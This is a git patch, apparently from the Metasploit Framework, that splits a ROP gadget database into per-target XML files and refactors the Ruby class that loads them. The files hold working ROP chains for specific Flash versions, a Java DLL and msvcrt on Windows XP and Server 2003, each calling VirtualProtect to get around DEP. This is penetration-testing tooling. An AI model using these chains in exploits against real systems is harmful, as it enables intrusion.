From ba1b65742e805f5527aaea55459be38ab69fbeee Mon Sep 17 00:00:00 2001
From: sinn3r <msfsinn3r@gmail.com>
Date: Tue, 2 Oct 2012 11:27:10 -0500
Subject: [PATCH] Separate XML for various DLLs.

---
 data/ropdb/flash.xml          |  80 +++++++++++++++++
 data/ropdb/java.xml           |  27 ++++++
 data/ropdb/msvcrt.xml         |  56 ++++++++++++
 data/ropdb/ropdb.xml          | 159 ----------------------------------
 lib/rex/exploitation/ropdb.rb |  93 ++++++++++++--------
 5 files changed, 218 insertions(+), 197 deletions(-)
 create mode 100644 data/ropdb/flash.xml
 create mode 100644 data/ropdb/java.xml
 create mode 100644 data/ropdb/msvcrt.xml
 delete mode 100644 data/ropdb/ropdb.xml

diff --git a/data/ropdb/flash.xml b/data/ropdb/flash.xml
new file mode 100644
index 0000000000..0938e74829
--- /dev/null
+++ b/data/ropdb/flash.xml
@@ -0,0 +1,80 @@
+<?xml version="1.0" encoding="ISO-8859-1"?>
+<db>
+<rop>
+	<compatibility>
+		<target>11.3.300.257</target>
+	</compatibility>
+
+	<gadgets base="0x10000000">
+		<gadget offset="0x00243043">POP EAX # RETN</gadget>
+		<gadget offset="0x006e3384">ptr to VirtualProtect()</gadget>
+		<gadget offset="0x0044a4aa">MOV EAX,DWORD PTR DS:[EAX] # RETN</gadget>
+		<gadget offset="0x003d54df">XCHG EAX,ESI # RETN</gadget>
+		<gadget offset="0x005f0b25">POP EBP # RETN</gadget>
+		<gadget offset="0x002ed0f1">jmp esp</gadget>
+		<gadget offset="0x003eb988">POP EBX # RETN</gadget>
+		<gadget value="0x00000400">0x00000400-> ebx</gadget>
+		<gadget offset="0x00662e60">POP EDX # RETN</gadget>
+		<gadget value="0x00000040">0x00000040-> edx</gadget>
+		<gadget offset="0x0058289d">POP ECX # RETN</gadget>
+		<gadget offset="0x00955ebe">Writable location</gadget>
+		<gadget offset="0x00414e84">POP EDI # RETN</gadget>
+		<gadget offset="0x004de801">RETN (ROP NOP)</gadget>
+		<gadget offset="0x0024044c">POP EAX # RETN</gadget>
+		<gadget value="nop">nop</gadget>
+		<gadget offset="0x00627674">PUSHAD # RETN</gadget>
+	</gadgets>
+</rop>
+
+<rop>
+	<compatibility>
+		<target>11.3.300.265</target>
+	</compatibility>
+
+	<gadgets base="0x10000000">
+		<gadget offset="0x00487414">POP EAX # RETN</gadget>
+		<gadget offset="0x006e338c">ptr to VirtualProtect()</gadget>
+		<gadget offset="0x00437d39">MOV EAX,DWORD PTR DS:[EAX] # RETN</gadget>
+		<gadget offset="0x0008f9c6">XCHG EAX,ESI # RETN</gadget>
+		<gadget offset="0x000baf77">POP EBP # RETN</gadget>
+		<gadget offset="0x002d8d5c">jmp esp</gadget>
+		<gadget offset="0x00005604">POP EBX # RETN</gadget>
+		<gadget value="0x00000400">0x00000400-> ebx</gadget>
+		<gadget offset="0x0064a4d7">POP EDX # RETN</gadget>
+		<gadget value="0x00000040">0x00000040-> edx</gadget>
+		<gadget offset="0x004087db">POP ECX # RETN</gadget>
+		<gadget offset="0x00955197">Writable location</gadget>
+		<gadget offset="0x005be57f">POP EDI # RETN</gadget>
+		<gadget offset="0x003a0002">RETN (ROP NOP)</gadget>
+		<gadget offset="0x00244a82">POP EAX # RETN</gadget>
+		<gadget value="nop">nop</gadget>
+		<gadget offset="0x004cbc7f">PUSHAD # RETN</gadget>
+	</gadgets>
+</rop>
+
+<rop>
+	<compatibility>
+		<target>11.3.300.268</target>
+	</compatibility>
+
+	<gadgets base="0x10000000">
+		<gadget offset="0x0012429b">POP ECX # RETN</gadget>
+		<gadget offset="0x006e438c">ptr to VirtualProtect()</gadget>
+		<gadget offset="0x00481a7d">MOV EAX,DWORD PTR DS:[ECX]</gadget>
+		<gadget offset="0x006ae8d7">XCHG EAX,ESI # RETN</gadget>
+		<gadget offset="0x000a6b69">POP EBP # RETN</gadget>
+		<gadget offset="0x002b95bb">jmp esp</gadget>
+		<gadget offset="0x0027f328">POP EBX # RETN</gadget>
+		<gadget value="0x00000400">0x00000400-> ebx</gadget>
+		<gadget offset="0x00686fe5">POP EDX # RETN</gadget>
+		<gadget value="0x00000040">0x00000040-> edx</gadget>
+		<gadget offset="0x0017e345">POP ECX # RETN</gadget>
+		<gadget offset="0x0092027a">Writable location</gadget>
+		<gadget offset="0x002a394a">POP EDI # RETN</gadget>
+		<gadget offset="0x00593802"># RETN (ROP NOP)</gadget>
+		<gadget offset="0x002447d1">POP EAX # RETN</gadget>
+		<gadget value="nop">nop</gadget>
+		<gadget offset="0x0062857d">PUSHAD # RETN</gadget>
+	</gadgets>
+</rop>
+</db>
\ No newline at end of file
diff --git a/data/ropdb/java.xml b/data/ropdb/java.xml
new file mode 100644
index 0000000000..b8f70b0417
--- /dev/null
+++ b/data/ropdb/java.xml
@@ -0,0 +1,27 @@
+<?xml version="1.0" encoding="ISO-8859-1"?>
+<db>
+<rop>
+	<compatibility>
+		<target>*</target>
+	</compatibility>
+
+	<gadgets base="0x7c340000">
+		<gadget offset="0x0000252c">POP EBP # RETN</gadget>
+		<gadget offset="0x0000252c">skip 4 bytes</gadget>
+		<gadget offset="0x0002c55a">POP EBX # RETN</gadget>
+		<gadget value="0x00000400">0x00000400-> ebx</gadget>
+		<gadget offset="0x00005249">POP EDX # RETN</gadget>
+		<gadget value="0x00000040">0x00000040-> edx</gadget>
+		<gadget offset="0x000011c0">POP ECX # RETN</gadget>
+		<gadget offset="0x00051897">Writable location</gadget>
+		<gadget offset="0x0000b8d7">POP EDI # RETN</gadget>
+		<gadget offset="0x00006c0b">RETN (ROP NOP)</gadget>
+		<gadget offset="0x00026fa6">POP ESI # RETN</gadget>
+		<gadget offset="0x000015a2">JMP [EAX]</gadget>
+		<gadget offset="0x000362fb">POP EAX # RETN</gadget>
+		<gadget offset="0x0003a151">ptr to VirtualProtect()</gadget>
+		<gadget offset="0x00038c81">PUSHAD # ADD AL,0EF # RETN</gadget>
+		<gadget offset="0x00005c30">ptr to 'push esp #  ret</gadget>
+	</gadgets>
+</rop>
+</db>
\ No newline at end of file
diff --git a/data/ropdb/msvcrt.xml b/data/ropdb/msvcrt.xml
new file mode 100644
index 0000000000..13b85cedec
--- /dev/null
+++ b/data/ropdb/msvcrt.xml
@@ -0,0 +1,56 @@
+<?xml version="1.0" encoding="ISO-8859-1"?>
+<db>
+<rop>
+	<compatibility>
+		<target>WINDOWS XP SP2</target>
+		<target>WINDOWS XP SP3</target>
+	</compatibility>
+
+	<gadgets base="0x77c10000">
+		<gadget offset="0x0002ee15">POP EBP # RETN</gadget>
+		<gadget offset="0x0002ee15">skip 4 bytes</gadget>
+		<gadget offset="0x0003fa1c">POP EBX # RETN</gadget>
+		<gadget value="0x00000400">0x00000400-> ebx</gadget>
+		<gadget offset="0x00040d13">POP EDX # RETN</gadget>
+		<gadget value="0x00000040">0x00000040-> edx</gadget>
+		<gadget offset="0x0002eeef">POP ECX # RETN</gadget>
+		<gadget offset="0x0004d9bb">Writable location</gadget>
+		<gadget offset="0x0001a88c">POP EDI # RETN</gadget>
+		<gadget offset="0x00029f92">RETN (ROP NOP)</gadget>
+		<gadget offset="0x0002a184">POP ESI # RETN</gadget>
+		<gadget offset="0x0001aacc">JMP [EAX]</gadget>
+		<gadget offset="0x0002b860">POP EAX # RETN</gadget>
+		<gadget offset="0x00001120">ptr to VirtualProtect()</gadget>
+		<gadget offset="0x00002df9">PUSHAD # RETN</gadget>
+		<gadget offset="0x00025459">ptr to 'push esp #  ret</gadget>
+	</gadgets>
+</rop>
+
+<rop>
+	<compatibility>
+		<target>WINDOWS SERVER 2003 SP1</target>
+		<target>WINDOWS SERVER 2003 SP2</target>
+	</compatibility>
+
+	<gadgets base="0x77ba0000">
+		<gadget offset="0x0003eebf">POP EAX # RETN</gadget>
+		<gadget offset="0x00001114">ptr to VirtualProtect()</gadget>
+		<gadget offset="0x0001f244">MOV EAX,DWORD PTR DS:[EAX] # POP EBP # RETN</gadget>
+		<gadget value="junk">Filler</gadget>
+		<gadget offset="0x00010c86">XCHG EAX,ESI # RETN</gadget>
+		<gadget offset="0x00026320">POP EBP # RETN</gadget>
+		<gadget offset="0x00042265">PUSH ESP # RETN</gadget>
+		<gadget offset="0x000385b7">POP EBX # RETN</gadget>
+		<gadget value="0x00000400">0x00000400-> ebx</gadget>
+		<gadget offset="0x0003e4fc">POP EDX # RETN</gadget>
+		<gadget value="0x00000040">0x00000040-> edx</gadget>
+		<gadget offset="0x000330fb">POP ECX # RETN</gadget>
+		<gadget offset="0x0004ff56">Writable location</gadget>
+		<gadget offset="0x00038a92">POP EDI # RETN</gadget>
+		<gadget offset="0x00037d82">RETN (ROP NOP)</gadget>
+		<gadget offset="0x0003eebf">POP EAX # RETN</gadget>
+		<gadget value="nop">nop</gadget>
+		<gadget offset="0x00046591">PUSHAD # ADD AL,0EF # RETN</gadget>
+	</gadgets>
+</rop>
+</db>
\ No newline at end of file
diff --git a/data/ropdb/ropdb.xml b/data/ropdb/ropdb.xml
deleted file mode 100644
index fe77866d00..0000000000
--- a/data/ropdb/ropdb.xml
+++ /dev/null
@@ -1,159 +0,0 @@
-<?xml version="1.0" encoding="ISO-8859-1"?>
-<db>
-	<rop name='msvcrt'>
-		<compatibility>
-			<target>WINDOWS XP SP2</target>
-			<target>WINDOWS XP SP3</target>
-		</compatibility>
-
-		<gadgets base="0x77c10000">
-			<gadget offset="0x0002ee15">POP EBP # RETN</gadget>
-			<gadget offset="0x0002ee15">skip 4 bytes</gadget>
-			<gadget offset="0x0003fa1c">POP EBX # RETN</gadget>
-			<gadget value="0x00000400">0x00000400-> ebx</gadget>
-			<gadget offset="0x00040d13">POP EDX # RETN</gadget>
-			<gadget value="0x00000040">0x00000040-> edx</gadget>
-			<gadget offset="0x0002eeef">POP ECX # RETN</gadget>
-			<gadget offset="0x0004d9bb">Writable location</gadget>
-			<gadget offset="0x0001a88c">POP EDI # RETN</gadget>
-			<gadget offset="0x00029f92">RETN (ROP NOP)</gadget>
-			<gadget offset="0x0002a184">POP ESI # RETN</gadget>
-			<gadget offset="0x0001aacc">JMP [EAX]</gadget>
-			<gadget offset="0x0002b860">POP EAX # RETN</gadget>
-			<gadget offset="0x00001120">ptr to VirtualProtect()</gadget>
-			<gadget offset="0x00002df9">PUSHAD # RETN</gadget>
-			<gadget offset="0x00025459">ptr to 'push esp #  ret</gadget>
-		</gadgets>
-	</rop>
-
-	<rop name='msvcrt'>
-		<compatibility>
-			<target>WINDOWS SERVER 2003 SP1</target>
-			<target>WINDOWS SERVER 2003 SP2</target>
-		</compatibility>
-
-		<gadgets base="0x77ba0000">
-			<gadget offset="0x0003eebf">POP EAX # RETN</gadget>
-			<gadget offset="0x00001114">ptr to VirtualProtect()</gadget>
-			<gadget offset="0x0001f244">MOV EAX,DWORD PTR DS:[EAX] # POP EBP # RETN</gadget>
-			<gadget value="junk">Filler</gadget>
-			<gadget offset="0x00010c86">XCHG EAX,ESI # RETN</gadget>
-			<gadget offset="0x00026320">POP EBP # RETN</gadget>
-			<gadget offset="0x00042265">PUSH ESP # RETN</gadget>
-			<gadget offset="0x000385b7">POP EBX # RETN</gadget>
-			<gadget value="0x00000400">0x00000400-> ebx</gadget>
-			<gadget offset="0x0003e4fc">POP EDX # RETN</gadget>
-			<gadget value="0x00000040">0x00000040-> edx</gadget>
-			<gadget offset="0x000330fb">POP ECX # RETN</gadget>
-			<gadget offset="0x0004ff56">Writable location</gadget>
-			<gadget offset="0x00038a92">POP EDI # RETN</gadget>
-			<gadget offset="0x00037d82">RETN (ROP NOP)</gadget>
-			<gadget offset="0x0003eebf">POP EAX # RETN</gadget>
-			<gadget value="nop">nop</gadget>
-			<gadget offset="0x00046591">PUSHAD # ADD AL,0EF # RETN</gadget>
-		</gadgets>
-	</rop>
-
-	<rop name='flash'>
-		<compatibility>
-			<target>11.3.300.257</target>
-		</compatibility>
-
-		<gadgets base="0x10000000">
-			<gadget offset="0x00243043">POP EAX # RETN</gadget>
-			<gadget offset="0x006e3384">ptr to VirtualProtect()</gadget>
-			<gadget offset="0x0044a4aa">MOV EAX,DWORD PTR DS:[EAX] # RETN</gadget>
-			<gadget offset="0x003d54df">XCHG EAX,ESI # RETN</gadget>
-			<gadget offset="0x005f0b25">POP EBP # RETN</gadget>
-			<gadget offset="0x002ed0f1">jmp esp</gadget>
-			<gadget offset="0x003eb988">POP EBX # RETN</gadget>
-			<gadget value="0x00000400">0x00000400-> ebx</gadget>
-			<gadget offset="0x00662e60">POP EDX # RETN</gadget>
-			<gadget value="0x00000040">0x00000040-> edx</gadget>
-			<gadget offset="0x0058289d">POP ECX # RETN</gadget>
-			<gadget offset="0x00955ebe">Writable location</gadget>
-			<gadget offset="0x00414e84">POP EDI # RETN</gadget>
-			<gadget offset="0x004de801">RETN (ROP NOP)</gadget>
-			<gadget offset="0x0024044c">POP EAX # RETN</gadget>
-			<gadget value="nop">nop</gadget>
-			<gadget offset="0x00627674">PUSHAD # RETN</gadget>
-		</gadgets>
-	</rop>
-
-	<rop name='flash'>
-		<compatibility>
-			<target>11.3.300.265</target>
-		</compatibility>
-
-		<gadgets base="0x10000000">
-			<gadget offset="0x00487414">POP EAX # RETN</gadget>
-			<gadget offset="0x006e338c">ptr to VirtualProtect()</gadget>
-			<gadget offset="0x00437d39">MOV EAX,DWORD PTR DS:[EAX] # RETN</gadget>
-			<gadget offset="0x0008f9c6">XCHG EAX,ESI # RETN</gadget>
-			<gadget offset="0x000baf77">POP EBP # RETN</gadget>
-			<gadget offset="0x002d8d5c">jmp esp</gadget>
-			<gadget offset="0x00005604">POP EBX # RETN</gadget>
-			<gadget value="0x00000400">0x00000400-> ebx</gadget>
-			<gadget offset="0x0064a4d7">POP EDX # RETN</gadget>
-			<gadget value="0x00000040">0x00000040-> edx</gadget>
-			<gadget offset="0x004087db">POP ECX # RETN</gadget>
-			<gadget offset="0x00955197">Writable location</gadget>
-			<gadget offset="0x005be57f">POP EDI # RETN</gadget>
-			<gadget offset="0x003a0002">RETN (ROP NOP)</gadget>
-			<gadget offset="0x00244a82">POP EAX # RETN</gadget>
-			<gadget value="nop">nop</gadget>
-			<gadget offset="0x004cbc7f">PUSHAD # RETN</gadget>
-		</gadgets>
-	</rop>
-
-	<rop name='flash'>
-		<compatibility>
-			<target>11.3.300.268</target>
-		</compatibility>
-
-		<gadgets base="0x10000000">
-			<gadget offset="0x0012429b">POP ECX # RETN</gadget>
-			<gadget offset="0x006e438c">ptr to VirtualProtect()</gadget>
-			<gadget offset="0x00481a7d">MOV EAX,DWORD PTR DS:[ECX]</gadget>
-			<gadget offset="0x006ae8d7">XCHG EAX,ESI # RETN</gadget>
-			<gadget offset="0x000a6b69">POP EBP # RETN</gadget>
-			<gadget offset="0x002b95bb">jmp esp</gadget>
-			<gadget offset="0x0027f328">POP EBX # RETN</gadget>
-			<gadget value="0x00000400">0x00000400-> ebx</gadget>
-			<gadget offset="0x00686fe5">POP EDX # RETN</gadget>
-			<gadget value="0x00000040">0x00000040-> edx</gadget>
-			<gadget offset="0x0017e345">POP ECX # RETN</gadget>
-			<gadget offset="0x0092027a">Writable location</gadget>
-			<gadget offset="0x002a394a">POP EDI # RETN</gadget>
-			<gadget offset="0x00593802"># RETN (ROP NOP)</gadget>
-			<gadget offset="0x002447d1">POP EAX # RETN</gadget>
-			<gadget value="nop">nop</gadget>
-			<gadget offset="0x0062857d">PUSHAD # RETN</gadget>
-		</gadgets>
-	</rop>
-
-	<rop name='java'>
-		<compatibility>
-			<target>*</target>
-		</compatibility>
-
-		<gadgets base="0x7c340000">
-			<gadget offset="0x0000252c">POP EBP # RETN</gadget>
-			<gadget offset="0x0000252c">skip 4 bytes</gadget>
-			<gadget offset="0x0002c55a">POP EBX # RETN</gadget>
-			<gadget value="0x00000400">0x00000400-> ebx</gadget>
-			<gadget offset="0x00005249">POP EDX # RETN</gadget>
-			<gadget value="0x00000040">0x00000040-> edx</gadget>
-			<gadget offset="0x000011c0">POP ECX # RETN</gadget>
-			<gadget offset="0x00051897">Writable location</gadget>
-			<gadget offset="0x0000b8d7">POP EDI # RETN</gadget>
-			<gadget offset="0x00006c0b">RETN (ROP NOP)</gadget>
-			<gadget offset="0x00026fa6">POP ESI # RETN</gadget>
-			<gadget offset="0x000015a2">JMP [EAX]</gadget>
-			<gadget offset="0x000362fb">POP EAX # RETN</gadget>
-			<gadget offset="0x0003a151">ptr to VirtualProtect()</gadget>
-			<gadget offset="0x00038c81">PUSHAD # ADD AL,0EF # RETN</gadget>
-			<gadget offset="0x00005c30">ptr to 'push esp #  ret</gadget>
-		</gadgets>
-	</rop>
-</db>
\ No newline at end of file
diff --git a/lib/rex/exploitation/ropdb.rb b/lib/rex/exploitation/ropdb.rb
index e617b41fe9..630b9a131c 100644
--- a/lib/rex/exploitation/ropdb.rb
+++ b/lib/rex/exploitation/ropdb.rb
@@ -13,9 +13,7 @@ module Exploitation
 ###
 class RopDb
 	def initialize
-		f = open(File.join(File.dirname(__FILE__), '../../../data/ropdb', 'ropdb.xml'))
-		@xml = REXML::Document.new(f.read)
-		f.close
+		@base_path = File.join(File.dirname(__FILE__), '../../../data/ropdb/')
 	end
 
 	public
@@ -24,17 +22,14 @@ class RopDb
 	#
 	# Returns true if a ROP chain is available, otherwise false
 	#
-	def has_rop?(rop)
-		@xml.elements.each("db/rop") { |e|
-			name = e.attributes['name']
-			return true if name =~ /#{rop}/i
-		}
-		return false
+	def has_rop?(rop_name)
+		File.exists?(File.join(@base_path, "#{rop_name}.xml"))
 	end
 
 	#
 	# Returns an array of ROP gadgets. Each gadget can either be an offset, or a value (symbol or
-	# some integer).  When the value is a symbol, it can be one of these: :nop, :junk, :size.
+	# some integer).  When the value is a symbol, it can be one of these: :nop, :junk, :size,
+	# and :size_negate.
 	# Note if no RoP is found, it returns an empry array.
 	# Arguments:
 	# rop_name - name of the ROP chain.
@@ -46,10 +41,13 @@ class RopDb
 		target = opts['target'] || ''
 		base   = opts['base']   || nil
 
+		raise RuntimeError, "#{rop} ROP chain is not available" if not has_rop?(rop)
+		xml = load_rop(File.join(@base_path, "#{rop}.xml"))
+
 		gadgets = []
-		@xml.elements.each("db/rop") { |e|
+
+		xml.elements.each("db/rop") { |e|
 			name = e.attributes['name']
-			next if name !~ /^#{rop}$/i
 			next if not has_target?(e, target)
 
 			if not base
@@ -57,33 +55,9 @@ class RopDb
 				base = default.to_i(16)
 			end
 
-			e.elements.each('gadgets/gadget') { |g|
-				offset = g.attributes['offset']
-				value  = g.attributes['value']
-
-				if offset
-					addr = offset.scan(/^0x([0-9a-f]+)$/i).flatten[0]
-					gadgets << (base + addr.to_i(16))
-				elsif value
-					case value
-					when 'nop'
-						gadgets << :nop
-					when 'junk'
-						gadgets << :junk
-					when 'size'
-						gadgets << :size
-					when 'size_negate'
-						gadgets << :size_negate
-					else
-						gadgets << value.to_i(16)
-					end
-				else
-					raise RuntimeError, "Missing offset or value attribute in '#{name}'"
-				end
-			}
+			gadgets << parse_gadgets(e, base)
 		}
-		gadgets = gadgets.flatten
-		return gadgets
+		return gadgets.flatten
 	end
 
 
@@ -140,6 +114,49 @@ class RopDb
 		}
 		return false
 	end
+
+	#
+	# Returns the database in XML
+	#
+	def load_rop(file_path)
+		f = open(file_path)
+		xml = REXML::Document.new(f.read)
+		f.close
+		return xml
+	end
+
+
+	#
+	# Returns gadgets
+	#
+	def parse_gadgets(e, image_base)
+		gadgets = []
+		e.elements.each('gadgets/gadget') { |g|
+			offset = g.attributes['offset']
+			value  = g.attributes['value']
+
+			if offset
+				addr = offset.scan(/^0x([0-9a-f]+)$/i).flatten[0]
+				gadgets << (image_base + addr.to_i(16))
+			elsif value
+				case value
+				when 'nop'
+					gadgets << :nop
+				when 'junk'
+					gadgets << :junk
+				when 'size'
+					gadgets << :size
+				when 'size_negate'
+					gadgets << :size_negate
+				else
+					gadgets << value.to_i(16)
+				end
+			else
+				raise RuntimeError, "Missing offset or value attribute in '#{name}'"
+			end
+		}
+		return gadgets
+	end
 end
 
 end